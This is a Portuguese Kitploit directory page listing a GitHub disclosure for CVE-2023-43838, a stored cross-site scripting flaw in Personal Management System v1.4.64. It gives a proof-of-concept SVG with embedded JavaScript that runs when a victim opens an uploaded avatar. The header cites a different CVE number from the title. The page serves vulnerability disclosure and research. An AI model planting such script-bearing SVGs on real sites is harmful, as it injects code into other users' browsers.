Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-43838 — Public disclosure for CVE-2023-31584. | Kitploit
Ferramentas/GitHubGitHub/rootd4ddy/cve-2023-43838
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubrootd4ddy/cve-2023-43838

CVE-2023-43838

Public disclosure for CVE-2023-31584.

Ver Repositório
1há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-43838

Uma vulnerabilidade de upload arbitrário de arquivos no Personal Management System v1.4.64 permite que atacantes executem código arbitrário através do upload de um arquivo SVG manipulado no avatar do perfil do usuário.


[Informações Adicionais] 1.) Crie alert.svg com o seguinte conteúdo:

root@kitploit:~
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
    <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
    <script type="text/javascript">
       alert("huntr.dev");
    </script>
 </svg>

2.) Hospede o .SVG em um servidor web.

3.) Faça upload do .SVG como imagem de avatar. 4.) Quando um usuário abre o avatar em uma aba separada, o javascript armazenado no arquivo .SVG é executado.

Referências: https://github.com/Volmarg/personal-management-system

Baixar ferramenta